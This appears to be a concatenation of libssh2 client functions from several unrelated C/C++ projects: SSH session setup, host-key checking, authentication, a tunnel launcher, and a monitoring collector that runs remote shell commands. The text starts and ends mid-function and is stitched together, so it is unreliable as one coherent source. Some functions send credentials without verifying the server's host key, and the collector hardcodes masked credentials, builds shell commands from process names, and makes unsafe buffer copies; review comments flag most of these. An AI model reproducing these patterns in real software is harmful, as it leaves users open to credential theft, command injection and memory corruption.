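        session_error_setg(errp, s, "failed to establish SSH session");
        goto err;
    }

    /* Check the remote host's key against known_hosts. This runs before
     * authenticate(), so no credentials are offered to a host whose key
     * was rejected. */
    ret = check_host_key(s, s->inet->host, port, host_key_check,
                         errp);
    if (ret < 0) {
        goto err;
    }

    /* Authenticate. */
    ret = authenticate(s, user, errp);
    if (ret < 0) {
        goto err;
    }

    /* Start SFTP. */
    s->sftp = libssh2_sftp_init(s->session);
    if (!s->sftp) {
        session_error_setg(errp, s, "failed to initialize sftp handle");
        ret = -EINVAL;
        goto err;
    }

    /* Open the remote file. */
    DPRINTF("opening file %s flags=0x%x creat_mode=0%o",
            path, ssh_flags, creat_mode);
    s->sftp_handle = libssh2_sftp_open(s->sftp, path, ssh_flags, creat_mode);
    if (!s->sftp_handle) {
        session_error_setg(errp, s, "failed to open remote file '%s'", path);
        ret = -EINVAL;
        goto err;
    }

    /* Read the attributes while opts is still alive, so that a failure can
     * use the common error path. Returning directly here used to leave the
     * file handle, SFTP session and SSH session open. */
    r = libssh2_sftp_fstat(s->sftp_handle, &s->attrs);
    if (r < 0) {
        sftp_error_setg(errp, s, "failed to read file attributes");
        ret = -EINVAL;
        goto err;
    }

    qemu_opts_del(opts);

    return 0;

 err:
    if (s->sftp_handle) {
        libssh2_sftp_close(s->sftp_handle);
    }
    s->sftp_handle = NULL;
    if (s->sftp) {
        libssh2_sftp_shutdown(s->sftp);
    }
    s->sftp = NULL;
    if (s->session) {
        libssh2_session_disconnect(s->session,
                                   "from qemu ssh client: "
                                   "error opening connection");
        libssh2_session_free(s->session);
    }
    s->session = NULL;

    qemu_opts_del(opts);

    return ret;
}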
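/*
 * Connect to usm->remote, run the SSH handshake, verify the server's host
 * key (unless disabled) and authenticate.
 *
 * usm       - mountpoint description: remote address, optional credentials
 * socket_fd - out: the connected socket, written only on success
 * session   - out: the libssh2 session created here
 *
 * Authentication order: if the mountpoint carries both username and
 * password, only that pair is tried. Otherwise, for the mountpoint or
 * global username, the global password, the ssh-agent and a key file are
 * tried in turn; a failed method falls through to the next one.
 *
 * Returns 0 on success, 1 on failure (the socket is closed).
 *
 * NOTE(review): on failure the session left in *session is not freed here;
 * presumably the caller releases it -- verify.
 */
static int uwsgi_init_ssh_session(
	struct uwsgi_ssh_mountpoint *usm,
	int* socket_fd,
	LIBSSH2_SESSION **session) {

	int sock = uwsgi_connect(usm->remote, ulibssh2.ssh_timeout, 1);
	if (sock < 0) {
		uwsgi_error("uwsgi_init_ssh_session()/uwsgi_connect()");
		return 1;
	}

	int rc = libssh2_init(0);
	if (rc) {
		uwsgi_error("uwsgi_init_ssh_session()/libssh2_init()");
		goto shutdown;
	}

	*session = libssh2_session_init();
	// Test the session that was just created. The out-parameter itself was
	// tested before, so a failed allocation went unnoticed.
	if (!*session) {
		uwsgi_error("uwsgi_init_ssh_session()/libssh2_session_init()");
		goto shutdown;
	}

	libssh2_session_set_blocking(*session, 0);

	while ((rc = libssh2_session_handshake(*session, sock)) == LIBSSH2_ERROR_EAGAIN) {
		uwsgi_ssh_waitsocket(sock, *session);
	}
	if (rc) {
		uwsgi_error("uwsgi_init_ssh_session()/libssh2_session_handshake()");
		goto shutdown;
	}

	// Server authentication. With disable_remote_fingerprint_check set, the
	// credentials below are offered to a server whose identity was never
	// checked.
	if (!ulibssh2.disable_remote_fingerprint_check) {
		LIBSSH2_KNOWNHOSTS *nh = libssh2_knownhost_init(*session);
		if (!nh) {
			uwsgi_error("uwsgi_init_ssh_session()/libssh2_knownhost_init()");
			goto shutdown;
		}

		// A read failure is only logged. The list then stays empty, which
		// should make the MATCH test below fail rather than pass.
		if (libssh2_knownhost_readfile(nh, ulibssh2.known_hosts_path, LIBSSH2_KNOWNHOST_FILE_OPENSSH) < 0) {
			uwsgi_error("uwsgi_init_ssh_session()/libssh2_knownhost_readfile()");
		}

		size_t len;
		int type;
		const char *fingerprint = libssh2_session_hostkey(*session, &len, &type);
		if (!fingerprint) {
			uwsgi_error("uwsgi_init_ssh_session()/libssh2_session_hostkey()");
			libssh2_knownhost_free(nh);
			goto shutdown;
		}

		// Split "host:port" on a private copy of the remote string.
		char *remoteaddr_str = uwsgi_str(usm->remote);
		char *port_str = strchr(remoteaddr_str, ':');
		int port = SSH_DEFAULT_PORT;

		if (port_str) {
			port_str[0] = 0;
			port_str++;
			port = atoi(port_str);
		}

		struct libssh2_knownhost *host;
		int check = libssh2_knownhost_checkp(
			nh,
			remoteaddr_str,
			port,
			fingerprint,
			len,
			LIBSSH2_KNOWNHOST_TYPE_PLAIN|LIBSSH2_KNOWNHOST_KEYENC_RAW,
			&host
		);

		free(remoteaddr_str);

		// Only an exact match is accepted; every other result is rejected.
		if (check != LIBSSH2_KNOWNHOST_CHECK_MATCH) {
			uwsgi_log("[SSH] Remote fingerprint check failed!\n");
			libssh2_knownhost_free(nh);
			goto shutdown;
		}

		libssh2_knownhost_free(nh);
	}

	// If specified, username and password are honored
	if (usm->username && usm->password) {
		while ((rc = libssh2_userauth_password(
					*session,
					usm->username,
					usm->password)
				) == LIBSSH2_ERROR_EAGAIN) {
			uwsgi_ssh_waitsocket(sock, *session);
		}

		if (rc) {
			uwsgi_error("uwsgi_init_ssh_session()/libssh2_userauth_password()");
			goto shutdown;
		} else {
			goto end;
		}

	// Else, let's try the fallback authentication methods:
	} else if (usm->username || ulibssh2.username) {

		// Let's choose which username to use
		char* auth_user = ulibssh2.username;
		if (usm->username) {
			auth_user = usm->username;
		}

		// Password authentication
		if (ulibssh2.auth_pw && ulibssh2.password) {
			while ((rc = libssh2_userauth_password(
						*session,
						auth_user,
						ulibssh2.password)
					) == LIBSSH2_ERROR_EAGAIN) {
				uwsgi_ssh_waitsocket(sock, *session);
			}
			if (rc) {
				// Not fatal: the next method is tried.
				uwsgi_error("uwsgi_init_ssh_session()/libssh2_userauth_password()");
			} else {
				goto end;
			}
		}

		// SSH agent authentication
		if (usm->ssh_agent || ulibssh2.auth_ssh_agent) {
			if (uwsgi_ssh_agent_auth(*session, sock, auth_user)) {
				// Not fatal: the next method is tried.
				uwsgi_error("uwsgi_init_ssh_session()/uwsgi_ssh_agent_auth()");
			} else {
				goto end;
			}
		}

		// Public key authentication
		if ((ulibssh2.private_key_path && ulibssh2.private_key_passphrase) ||
			(usm->priv_key_path && usm->priv_key_passphrase)) {

			// Mountpoint settings override the global ones, field by field.
			char *actual_pubk_path = ulibssh2.public_key_path;
			if (usm->pub_key_path) {
				actual_pubk_path = usm->pub_key_path;
			}

			char *actual_privk_path = ulibssh2.private_key_path;
			if (usm->priv_key_path) {
				actual_privk_path = usm->priv_key_path;
			}

			char *actual_passphrase = ulibssh2.private_key_passphrase;
			if (usm->priv_key_passphrase) {
				actual_passphrase = usm->priv_key_passphrase;
			}

			while ((rc = libssh2_userauth_publickey_fromfile(
						*session,
						auth_user,
						actual_pubk_path,
						actual_privk_path,
						actual_passphrase)
					) == LIBSSH2_ERROR_EAGAIN) {
				uwsgi_ssh_waitsocket(sock, *session);
			}

			if (rc == LIBSSH2_ERROR_PUBLICKEY_UNVERIFIED) {
				uwsgi_log("[SSH] ssh authentication failed (bad passphrase)\n");
			} else if (rc) {
				uwsgi_error("uwsgi_init_ssh_session()/libssh2_userauth_publickey_fromfile()");
			} else {
				goto end;
			}
		}
	}

	// If we arrive here, something went wrong.
	uwsgi_log("[SSH] session initialization failed (no authentication method worked)\n");

shutdown:
	close(sock);
	return 1;

end:
	// Otherwise, we're fine!
	*socket_fd = sock;
	return 0;
}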
// Creates m_socket and connects it to m_hostname:m_port. The connect is
// issued in non-blocking mode and then awaited with select(); `timeout` is
// treated as milliseconds. Throws NetworkTimeout when select() expires and
// Exception on any other failure. The socket is put back into blocking mode
// before returning.
void SshConnection::openSocket(unsigned const timeout)
{
   m_socket = socket(AF_INET, SOCK_STREAM, 0);
   if (m_socket < 0) throw Exception("Failed to create socket");

   setNonBlocking();

   struct sockaddr_in addr;
   addr.sin_family      = AF_INET;
   addr.sin_port        = htons(m_port);
   addr.sin_addr.s_addr = HostLookup(m_hostname);

   int rc = ::connect(m_socket, (struct sockaddr*)&addr, sizeof(struct sockaddr_in));

   // Value that means "connect still in progress" on this platform.
#ifdef WIN32
   if (rc == SOCKET_ERROR) rc = -1;
   int pending = WSAEWOULDBLOCK;
#else
   int pending = EINPROGRESS;
#endif

   if (rc < 0) {
      if (errno != pending) {
         QString text("Connection failed: ");
         throw Exception(text + lastError());
      }

      for (;;) {
         struct timeval wait;
         wait.tv_sec  = timeout / 1000;
         wait.tv_usec = 1000*(timeout % 1000);

         fd_set writable;
         FD_ZERO(&writable);
         FD_SET(m_socket, &writable);

         rc = select(m_socket+1, NULL, &writable, NULL, &wait);

         if (rc == 0) {
            throw NetworkTimeout();
         }

         if (rc < 0) {
            if (errno != EINTR) {
               QString text("Connection failed: ");
               throw Exception(text + lastError());
            }
            // Interrupted by a signal: wait again with a fresh timeout.
            continue;
         }

         // The socket became writable; SO_ERROR tells whether the connect
         // actually succeeded.
         socklen_t optLen = sizeof(int);
         int soError;

#ifdef WIN32
         if (getsockopt(m_socket, SOL_SOCKET, SO_ERROR, (char*)(&soError), &optLen) < 0) {
#else
         if (getsockopt(m_socket, SOL_SOCKET, SO_ERROR, (void*)(&soError), &optLen) < 0) {
#endif
            QString text("Error check on socket: ");
            throw Exception(text + lastError());
         }

         if (soError) {
            QString text("Connection failed ");
            text += QString::number(soError) + ": ";
            throw Exception(text + lastError());
         }

         break;
      }
   }

   setBlocking();
}


// Performs the SSH handshake on the open socket and authenticates with the
// requested method. Returns nothing; every failure is reported by throwing.
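// Runs the SSH handshake on m_socket and authenticates `username` with the
// method selected by `authentication`.
//
// On success m_status becomes Connection::Authenticated. Throws
// AuthenticationError when the server rejects the credentials,
// AuthenticationCancelled when the attempt is cancelled, and Exception for
// every other failure (invalid socket, handshake failure, method not offered
// by the server, key not found, ...).
//
// NOTE(review): the server's host key is never verified here (the only
// fingerprint code is the disabled block below), so the selected credentials
// are offered to whichever server completed the handshake. Add a host key
// check between the handshake and the authentication step.
void SshConnection::authenticate(AuthenticationT const authentication, QString& username)
{
   m_username = username;

   if (m_socket <= 0) throw Exception("Authentication on invalid socket");

   // Create a session instance
   m_session = libssh2_session_init();
   if (!m_session) throw Exception("Failed to initialize SSH session");

   // This trades welcome banners, exchange keys,
   // and sets up crypto, compression, and MAC layers
   int rc(0);
   while ((rc = libssh2_session_handshake(m_session, m_socket)) == LIBSSH2_ERROR_EAGAIN);

   if (rc) {
      QString msg("Failed to establish a valid SSH session (");
      msg += QString::number(rc) + "): ";
      throw Exception(msg + lastSessionError());
   }

   /* Can't get this working at the moment
      NOTE(review): this asks for the MD5 hash but prints 20 bytes; an MD5
      digest is 16 bytes (20 is the SHA-1 length), so the loop reads past it.

   const char* fingerprint(libssh2_hostkey_hash(m_session, LIBSSH2_HOSTKEY_HASH_MD5));

   fprintf(stderr, "SSH Fingerprint: ");
   for (int i = 0; i < 20; ++i) {
       fprintf(stderr, "%02X ", (unsigned char)fingerprint[i]);
   }
   fprintf(stderr, "\n");
   */

   // Check what authentication methods are available. Keep the Latin-1 copy
   // alive in a named variable and pass its byte length.
   QByteArray const userBytes(username.toLatin1());
   char* authenticationMethods =
      libssh2_userauth_list(m_session, userBytes.constData(), userBytes.length());

   // The list can be NULL; treat that as "no methods offered" so that the
   // strstr() calls below never receive a null pointer.
   char const* methods = authenticationMethods ? authenticationMethods : "";

   // Typical lists:
   //   publickey,gssapi-with-mic,password,hostbased
   //   publickey,keyboard-interactive

   rc = LIBSSH2_ERROR_METHOD_NOT_SUPPORTED;

   switch (authentication) {

      case None:
         break;

      case Agent:
         rc = connectAgent();
         break;

      case HostBased:
         if (strstr(methods, "hostbased") != NULL) {
            rc = connectHostBased();
         }
         break;

      case KeyboardInteractive:
         if (strstr(methods, "keyboard-interactive") != NULL) {
            rc = connectKeyboardInteractive();
         }
         break;

      case Password:
         if (strstr(methods, "password") != NULL) {
            rc = connectPassword();
         }
         break;

      case PublicKey:
         if (strstr(methods, "publickey") != NULL) {
            rc = connectPublicKey();
         }
         break;
   }

   QString msg;

   switch (rc) {
      case LIBSSH2_ERROR_NONE:
         m_status = Connection::Authenticated;
         QLOG_INFO() << "SSH Connection established";
         break;

      case LIBSSH2_ERROR_PUBLICKEY_NOT_FOUND:
         msg = "Public key not found for host " + m_hostname;
         throw Exception(msg);

      case LIBSSH2_ERROR_AUTHENTICATION_FAILED:
         throw AuthenticationError();

      case LIBSSH2_ERROR_METHOD_NOT_SUPPORTED:
         msg  = toString(authentication) + " authentication not supported\n\n";
         msg += "Supported methods: ";
         msg += QString(methods).replace(",",", ");
         throw Exception(msg);

      case LIBSSH2_ERROR_AUTHENTICATION_CANCELLED:
         throw AuthenticationCancelled();

      default:
         // Reuse the outer msg; a second declaration here shadowed it.
         msg  = "Authentication failed:\n";
         msg += lastSessionError();
         throw Exception(msg);
   }
}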
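/**
 * seashell_tunnel_connect_password (const char* host, const char* user,
 *    const char* password, int* error, char* remote_addr, int* family,
 *    char* target)
 * Connects to the host via SSH on port 22, and launches a Seashell backend
 * instance for that user on the host.
 *
 * Consults /etc/seashell_hosts for host's SSH public keys.  If this file does
 * not exist, this function will fail for security reasons: the known-hosts
 * list stays empty and only an exact match is accepted below.
 * /etc/seashell_hosts is a standard OpenSSH known_hosts file.
 *
 * Arguments:
 *  host - Host to connect to.
 *  user - User to run as.
 *  password - User's password.
 *  error - [optional] denotes error on failure.
 *  remote_addr - Address to which the remote IP address will
 *    be written.  Reserve 128 bytes.
 *  family - Address family (written once a connection is made).
 *  target - Target to execute.
 *
 * Returns:
 *  Handle to connection object on success, NULL otherwise.
 *  If error is NOT null, error will hold more detailed error information.
 *  On failure the socket and the SSH session are released here.
 */
struct seashell_connection* seashell_tunnel_connect_password (const char* host,
    const char* user,
    const char* password,
    int* error,
    char * remote_addr,
    int* family,
    char* target) {
  struct addrinfo hints;
  struct addrinfo *results, *rp;
  int sockfd = -1;
  int i, e;
  struct seashell_connection* result = NULL;
  LIBSSH2_SESSION* session = NULL;
  LIBSSH2_CHANNEL* channel = NULL;
  LIBSSH2_KNOWNHOSTS* hosts;
  struct libssh2_knownhost *hostkey;
  const char* fingerprint;
  const void* raw_addr = NULL;
  size_t len;
  int type;
  int check;

  /* Resolve the host's address.
   * See getaddrinfo(3) for how this works.
   */
  memset(&hints, 0, sizeof(hints));
  hints.ai_family = AF_UNSPEC;
  hints.ai_socktype = SOCK_STREAM;
  hints.ai_flags = 0;
  hints.ai_protocol = 0;

  e = getaddrinfo(host, "22", &hints, &results);
  if (e != 0) {
    SET_ERROR(TUNNEL_ERROR_RESOLV);
    return NULL;
  }

  for (rp = results; rp != NULL; rp = rp->ai_next) {
    sockfd = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol);
    if (sockfd == -1)
      continue;

    if (connect(sockfd, rp->ai_addr, rp->ai_addrlen) != -1)
      break;

    close(sockfd);
  }

  /* Either rp == NULL, in which case we failed at connecting,
   * or sockfd holds our socket.
   */
  if (rp == NULL) {
    freeaddrinfo(results);
    SET_ERROR(TUNNEL_ERROR_CONNECT);
    return NULL;
  }

  /* Write address that we're connecting to into remote_addr. */
  *family = rp->ai_family;
  switch (rp->ai_family) {
    case AF_INET:
      raw_addr = &((struct sockaddr_in *)rp->ai_addr)->sin_addr;
      break;
    case AF_INET6:
      raw_addr = &((struct sockaddr_in6 *)rp->ai_addr)->sin6_addr;
      break;
    default:
      break;
  }
  if (raw_addr == NULL ||
      inet_ntop(rp->ai_family, raw_addr, remote_addr, 128) == NULL) {
    /* These exits used to leak both the address list and the socket. */
    freeaddrinfo(results);
    close(sockfd);
    SET_ERROR(TUNNEL_ERROR_RESOLV);
    return NULL;
  }

  freeaddrinfo(results);

  /** Set up the session */
  session = libssh2_session_init();
  if (!session) {
    SET_ERROR(TUNNEL_ERROR_SESSION_START);
    goto session_teardown;
  }

  e = libssh2_session_handshake(session, sockfd);
  if (e) {
    SET_ERROR(TUNNEL_ERROR_SESSION_HANDSHAKE);
    goto session_teardown;
  }

  hosts = libssh2_knownhost_init(session);
  if (!hosts) {
    SET_ERROR(TUNNEL_ERROR_HOSTS_FILE);
    goto session_teardown;
  }

  /* A build that is not installed prefers DEBUG_HOSTS_FILE when that file
   * exists. The result of the read is not checked: an unreadable file
   * leaves the list empty and the check below then rejects the host. */
  if (!IS_INSTALLED() && access(DEBUG_HOSTS_FILE, F_OK) != -1) {
    libssh2_knownhost_readfile(hosts, DEBUG_HOSTS_FILE, LIBSSH2_KNOWNHOST_FILE_OPENSSH);
  } else {
    libssh2_knownhost_readfile(hosts, HOSTS_FILE, LIBSSH2_KNOWNHOST_FILE_OPENSSH);
  }

  fingerprint = libssh2_session_hostkey(session, &len, &type);
  if (!fingerprint || type == LIBSSH2_HOSTKEY_TYPE_UNKNOWN) {
    libssh2_knownhost_free(hosts);
    SET_ERROR(TUNNEL_ERROR_HOST);
    goto session_teardown;
  }

  /** NOTE: Documentation is buggy.  hostkey MUST be passed. */
  check = libssh2_knownhost_check(hosts, host, fingerprint, len,
      LIBSSH2_KNOWNHOST_TYPE_PLAIN | LIBSSH2_KNOWNHOST_KEYENC_RAW, &hostkey);

  /* Anything other than an exact match is refused before any credential is
   * sent. The key that was offered is dumped so an operator can review it. */
  if (check != LIBSSH2_KNOWNHOST_CHECK_MATCH) {
    int keytype = 0;

    switch (type) {
      case LIBSSH2_HOSTKEY_TYPE_RSA:
        keytype = LIBSSH2_KNOWNHOST_KEY_SSHRSA;
        break;
      case LIBSSH2_HOSTKEY_TYPE_DSS:
        /* Was SSHRSA by copy and paste; harmless only because the value
         * was recomputed in the call below. */
        keytype = LIBSSH2_KNOWNHOST_KEY_SSHDSS;
        break;
      default:
        break;
    }

    if (keytype) {
      libssh2_knownhost_addc(hosts, host, NULL,
          fingerprint, len,
          "Generated from Seashell Tunnel",
          strlen("Generated from Seashell Tunnel"),
          LIBSSH2_KNOWNHOST_TYPE_PLAIN | LIBSSH2_KNOWNHOST_KEYENC_RAW | keytype,
          NULL);

      libssh2_knownhost_writefile(hosts, DUMP_FILE, LIBSSH2_KNOWNHOST_FILE_OPENSSH);
      fprintf(stderr, "%s: Check SSH key for %s!  Keys written to %s\n", user, host, DUMP_FILE);
    } else {
      /* The stray DUMP_FILE argument had no matching conversion. */
      fprintf(stderr, "%s: Check SSH key for %s!\n", user, host);
      fprintf(stderr, "%s: Keys not written to file - contact Seashell Maintainers to add support for the LibSSH2 key format %d\n", user, type);
    }

    libssh2_knownhost_free(hosts);
    SET_ERROR(TUNNEL_ERROR_HOST);
    goto session_teardown;
  }
  libssh2_knownhost_free(hosts);

  /* Debug output: the first bytes of the raw host key (this is not a hash).
   * Bounded by len so a short key is never over-read. */
  FPRINTF_IF_DEBUG(stderr, "%s: Host check passed for %s (fingerprint type %d) - ", user, host, type);
  for(i = 0; i < 20 && (size_t)i < len; i++) {
    FPRINTF_IF_DEBUG(stderr, "%02X ", (unsigned char)fingerprint[i]);
  }
  FPRINTF_IF_DEBUG(stderr, "\n");

  e = libssh2_userauth_password(session, user, password);
  if (e) {
    FPRINTF_IF_DEBUG(stderr, "%s: Error authenticating: %d\n", user, e);
    SET_ERROR(TUNNEL_ERROR_CREDS);
    goto session_teardown;
  }

  channel = libssh2_channel_open_session(session);
  if (!channel) {
    SET_ERROR(TUNNEL_ERROR_CHANNEL_OPEN);
    goto session_teardown;
  }

  /**
   * Ideally we'd have a subsystem configured,
   * as I don't see a good way of pulling out of ssh2
   * if the target does not exist.
   */
  e = libssh2_channel_exec(channel, target);
  if (e) {
    SET_ERROR(TUNNEL_ERROR_LAUNCH_SEASHELL);
    goto channel_teardown;
  }

  result = malloc(sizeof(struct seashell_connection));
  if (!result) {
    SET_ERROR(TUNNEL_ERROR_SESSION_START);
    goto channel_teardown;
  }

  /* Ownership of the socket, session and channel moves to the result. */
  result->sockfd = sockfd;
  result->session = session;
  result->channel = channel;

  goto end;

channel_teardown:
  libssh2_channel_free(channel);
session_teardown:
  /* session is NULL when libssh2_session_init() itself failed. */
  if (session) {
    libssh2_session_free(session);
  }
  close(sockfd);
end:
  return result;
}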
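// Handles one monitoring sample.
//
// If the first entry carries a CancelOrderId, one cancel message per entry of
// conn->orderIds is written to the controller socket and the reply is stored
// in the line details. Otherwise every entry with a non-empty address is
// contacted over SSH (port 22, password authentication) and, depending on the
// entry's psl and status fields, a process listing, a disk usage listing, a
// database query and/or a maintenance script is run.
//
// Returns false when sample is NULL or when the SSH setup for a host fails
// (libssh2 initialisation, connect, session allocation); true otherwise.
//
// NOTE(review), security:
//  - The SSH and database credentials are literals in this function. They
//    should come from protected configuration, not from the source.
//  - The server's host key is never checked, so the password is sent to
//    whichever machine answers on the address taken from the sample.
//  - Process names and the path from conn->getPath() are pasted into shell
//    command lines. If either can be influenced from outside trusted
//    configuration they must be validated first.
//  - The sizes of ld.CancelOrderStatus, ld.processInfo, ld.spaceInfo and
//    ld.ipadress are not visible here. The copies into them are bounded by
//    the size of the source buffer (or not bounded at all), so each one
//    overflows if the destination is smaller -- confirm against lineDetails.
bool StartLineProcessCollector::collect(MONITORING::leaseProcessStart *sample, StartLineProcessConnector *conn)
{
    if (NULL == sample)
    {
        g_cSystemLogger.LogMessage("(%s:%s:%d):: sample is NULL \n \n ", LOG_LOCATION);
        return false;
    }

    int i=0;
    ItrServerDetails serIter;
    lineDetails ld;

    g_cSystemLogger.LogMessage("(%s:%s:%d)::cancelid %d \n ", LOG_LOCATION,sample->ip_info[i].CancelOrderId);

    if(sample->ip_info[i].CancelOrderId!=0)
    {
        char buf[50]={0};
        char recvbuf[512]={0};
        int recvLen = 0;

        g_cSystemLogger.LogMessage("(%s:%s:%d):: size of order vector %d \n ",LOG_LOCATION,conn->orderIds.size());

        for(i=0;i<conn->orderIds.size();i++)
        {
            // pos was read before it was ever written; it is the length of
            // the "#id#" payload placed after the 5 character header.
            int pos = 0;
            int j;

            pos+=sprintf(buf+5,"%s%d%s","#",conn->orderIds[i],"#");
            g_cSystemLogger.LogMessage("(%s:%s(:%d)::order length %d buf %s \n", LOG_LOCATION,pos,buf);

            char c='0';
            for(j=0;j<=3;j++)
            {
                buf[j]=c;
            }

            // NOTE(review): a single character holds the length, so a payload
            // longer than 9 characters yields a non-digit here.
            char p=(char)(((int)'0')+pos);
            buf[j]=p;

            g_cSystemLogger.LogMessage("(%s:%s(:%d)::Inside CancelOrder buf %s socketId %d \n", LOG_LOCATION,buf,CControllerThread::getInstance()->socketId);

            // Store the result of write(); the old code compared it with an
            // uninitialised variable instead of assigning it.
            recvLen = write(CControllerThread::getInstance()->socketId,buf,sizeof(buf));
            if(recvLen >= 0)
            {
                g_cSystemLogger.LogMessage("(%s:%s(:%d)::writeLen %d \n", LOG_LOCATION,recvLen);
            }
            g_cSystemLogger.LogMessage("(%s:%s(:%d)::write sucessfull writeLen %d \n", LOG_LOCATION,recvLen);

            // Clear the previous reply and leave room for the terminator so
            // that recvbuf is always a valid string. The parentheses matter:
            // without them recvLen received the result of the comparison.
            memset(recvbuf,0,sizeof(recvbuf));
            if((recvLen=recv(CControllerThread::getInstance()->socketId,recvbuf,sizeof(recvbuf)-1,0))<0)
            {
                g_cSystemLogger.LogMessage("(%s:%s(:%d)::Recv Error \n", LOG_LOCATION);
            }
            g_cSystemLogger.LogMessage("(%s:%s(:%d)::RecvLen %d recvbuf %s \n", LOG_LOCATION,recvLen,recvbuf);

            // NOTE(review): bounded by the source size, not the destination.
            strncpy(ld.CancelOrderStatus,recvbuf,sizeof(recvbuf));
            CcopyStructure::copyCommandData(ld, ld.line_count);

            memset(buf,0,sizeof(buf));
            sleep(1);
        }
        return true;
    }
    else
    {
        for(i=0;i<sample->ip_info.length();i++)
        {
            if(strcmp(sample->ip_info[i].ipadress,"")==0)
                break;

            LIBSSH2_CHANNEL *channel2 = NULL;
            LIBSSH2_SESSION *session = NULL;
            char* userName;
            char* passWord;
            struct sockaddr_in sin;
            int rc, sock, auth_pw = 0;
            int lnReturnCode = 0;
            char command[12324] = {0};
            char processes[8024] = {0};
            char *lpUserAuthList;

            g_cSystemLogger.LogMessage("(%s:%s:%d):: Debug", LOG_LOCATION);

            rc = libssh2_init(0);
            if (rc != 0)
            {
                g_cSystemLogger.LogMessage("(%s:%s(:%d)::failure establishing ssh", LOG_LOCATION);
                return false;
            }

            // NOTE(review): unbounded copy into ld.ipadress.
            strcpy(ld.ipadress,sample->ip_info[i].ipadress);
            g_cSystemLogger.LogMessage("(%s:%s:%d)::Sequence Length %d ipadress %s,and psl %s cancelOrderId %d value of i %d \n", LOG_LOCATION, sample->ip_info._length,sample->ip_info[i].ipadress,sample->ip_info[i].psl,sample->ip_info[i].CancelOrderId,i);

            sock = socket(AF_INET, SOCK_STREAM, 0);
            sin.sin_family = AF_INET;
            sin.sin_port = htons(22);
            sin.sin_addr.s_addr = inet_addr(sample->ip_info[i].ipadress);

            if (connect(sock, (struct sockaddr*) (&sin), sizeof (struct sockaddr_in)) != 0)
            {
                g_cSystemLogger.LogMessage("(%s:%s(:%d)::failure establishing ssh", LOG_LOCATION);
                // This returned -1, which converts to true in a bool function.
                close(sock);
                return false;
            }

            session = libssh2_session_init();
            if (session == NULL)
            {
                g_cSystemLogger.LogMessage("(%s:%s(:%d):: failure ssh session initiation", LOG_LOCATION);
                close(sock);
                return false;
            }
            if (libssh2_session_handshake(session, sock))
            {
                g_cSystemLogger.LogMessage("(%s:%s(:%d):: failure ssh session initiation", LOG_LOCATION);
            }

            userName = "******";
            passWord = "******";

            lpUserAuthList = libssh2_userauth_list(session, userName, strlen(userName));
            if (NULL == lpUserAuthList)
            {
                g_cSystemLogger.LogMessage("(%s:%s(:%d):: get user auth list failed", LOG_LOCATION);
            }

            char lcPreferredAuthMethod[20] = "password";
            g_cSystemLogger.LogMessage("(%s:%s(:%d)::authentication methods(%s)", LOG_LOCATION, lpUserAuthList ? lpUserAuthList : "");

            // A NULL list must not reach strstr().
            if (lpUserAuthList != NULL && strstr(lpUserAuthList, lcPreferredAuthMethod) != NULL)
            {
                auth_pw |= 1;
                g_cSystemLogger.LogMessage("(%s:%s(:%d)::authentication methods(%d)", LOG_LOCATION, auth_pw);
            }

            if (auth_pw & 1)
            {
                if (libssh2_userauth_password(session, userName, passWord))
                {
                    g_cSystemLogger.LogMessage("(%s:%s(:%d)::Authentation by password failed\n", LOG_LOCATION);
                }
                else
                {
                    g_cSystemLogger.LogMessage("(%s:%s(:%d)::Authentation by mint succesded\n", LOG_LOCATION);
                }
            }

            while ((channel2 = libssh2_channel_open_session(session)) == NULL &&
                   libssh2_session_last_error(session, NULL, NULL, 0) == LIBSSH2_ERROR_EAGAIN)
            {
                waitsocket(sock, session);
            }
            if (channel2 == NULL)
            {
                g_cSystemLogger.LogMessage("(%s:%s(:%d))ssh channel opening fail", LOG_LOCATION);
            }

            // From here on every command is skipped when channel2 is NULL:
            // either the channel never opened, or an earlier branch already
            // ran its command and freed it.

            if(strcmp(sample->ip_info[i].psl,"Process")==0)
            {
                g_cSystemLogger.LogMessage("(%s:%s(:%d)) Inside Process", LOG_LOCATION);
                for(serIter=conn->getServerInfo().begin();serIter!=conn->getServerInfo().end();serIter++)
                {
                    g_cSystemLogger.LogMessage("(%s:%s(:%d)) ipadress from iter %s", LOG_LOCATION,serIter->ipAdress);
                    tagServerInfo &tagServ = *serIter;
                    g_cSystemLogger.LogMessage("(%s:%s(:%d)) ipadress from tagserver %s sampeip %s \n", LOG_LOCATION,tagServ.ipAdress,sample->ip_info[i].ipadress);

                    if(strcmp(tagServ.ipAdress,sample->ip_info[i].ipadress)==0)
                    {
                        int pos=0;
                        bool listComplete = true;
                        g_cSystemLogger.LogMessage("(%s:%s(:%d)) tagServ %s sample %s processLen %d \n", LOG_LOCATION,tagServ.ipAdress,sample->ip_info[i].ipadress,tagServ.noOfProcess);

                        // Build "name|name|...". The loop starts at index 1,
                        // as before. Names go through "%s" instead of being
                        // used as the format string, and every write is
                        // bounded by the space left in processes.
                        for(int j=1;j<tagServ.noOfProcess;j++)
                        {
                            g_cSystemLogger.LogMessage("(%s:%s(:%d)) Process %s \n", LOG_LOCATION,tagServ.processes[j].name);
                            const bool lastName = (j==(tagServ.noOfProcess-1));
                            const int room = (int) sizeof (processes) - pos;
                            const int written = snprintf(processes+pos, room, "%s%s", tagServ.processes[j].name, lastName ? "" : "|");
                            if (written < 0 || written >= room)
                            {
                                // Do not run a command built from a cut-off list.
                                listComplete = false;
                                break;
                            }
                            pos+=written;
                        }

                        if (listComplete && channel2 != NULL)
                        {
                            snprintf(command, sizeof (command), "%s %s%s%s%s %s%s%s%s","ps -ef | egrep -v ","\"", "egrep|vi|tail|cat|emacs|more|nohup","\"" ,"| egrep","\"",processes,"\"","| grep -v daemon");
                            g_cSystemLogger.LogMessage("(%s:%s(:%d)) command %s", LOG_LOCATION,command);

                            while ((rc = libssh2_channel_exec(channel2, command)) == LIBSSH2_ERROR_EAGAIN)
                            {
                                waitsocket(sock, session);
                            }

                            // Clear the command text first and keep one byte
                            // for the terminator, so the buffer holds only
                            // the command output as a valid string.
                            memset(command, 0, sizeof (command));
                            lnReturnCode = (int) libssh2_channel_read(channel2, command, sizeof (command) - 1);
                            g_cSystemLogger.LogMessage("(%s:%s(:%d)) lnReturnCode %d command %s", LOG_LOCATION,lnReturnCode,command);

                            // NOTE(review): bounded by the source size.
                            strncpy(ld.processInfo,command,sizeof(command));
                            memset(command, 0, sizeof (command));
                            libssh2_channel_free(channel2);
                            channel2 = NULL;
                        }
                    }
                }
            }
            else if((strcmp(sample->ip_info[i].psl,"Space"))==0)
            {
                if (channel2 != NULL)
                {
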